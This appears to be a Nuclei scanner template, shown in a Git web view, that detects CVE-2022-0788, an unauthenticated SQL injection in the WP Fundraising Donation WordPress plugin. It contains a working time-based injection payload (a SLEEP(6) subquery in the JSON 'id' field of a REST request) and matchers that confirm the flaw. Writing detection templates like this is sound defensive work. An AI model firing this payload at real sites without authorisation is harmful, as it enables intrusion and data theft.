nuclei-templates/http/cves/2022/CVE-2022-0788.yaml

42 lines
1.6 KiB
YAML
Raw Normal View History

2022-11-07 15:16:36 +00:00
id: CVE-2022-0788
info:
name: WordPress WP Fundraising Donation and Crowdfunding Platform <1.5.0 - SQL Injection
2022-11-07 15:16:36 +00:00
author: theamanrawat
severity: critical
description: |
WordPress WP Fundraising Donation and Crowdfunding Platform plugin before 1.5.0 contains an unauthenticated SQL injection vulnerability. It does not sanitize and escape a parameter before using it in a SQL statement via a REST route. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-11-07 15:16:36 +00:00
reference:
- https://wpscan.com/vulnerability/fbc71710-123f-4c61-9796-a6a4fd354828
- https://wordpress.org/plugins/wp-fundraising-donation/
- https://nvd.nist.gov/vuln/detail/CVE-2022-0788
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2022-11-07 15:16:36 +00:00
cve-id: CVE-2022-0788
cwe-id: CWE-89
2022-11-07 15:16:36 +00:00
metadata:
verified: "true"
tags: cve,sqli,wordpress,wp-plugin,cve2022,wp,wp-fundraising-donation,unauth,wpscan
2022-11-07 15:16:36 +00:00
http:
2022-11-07 15:16:36 +00:00
- raw:
- |
2022-11-09 03:50:26 +00:00
@timeout: 10s
2022-11-07 15:16:36 +00:00
GET /index.php?rest_route=/xs-donate-form/payment-redirect/3 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"id": "(SELECT 1 FROM (SELECT(SLEEP(6)))me)", "formid": "1", "type": "online_payment"}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "Invalid payment.")'
2022-11-09 03:50:26 +00:00
condition: and
# Enhanced by md on 2022/12/09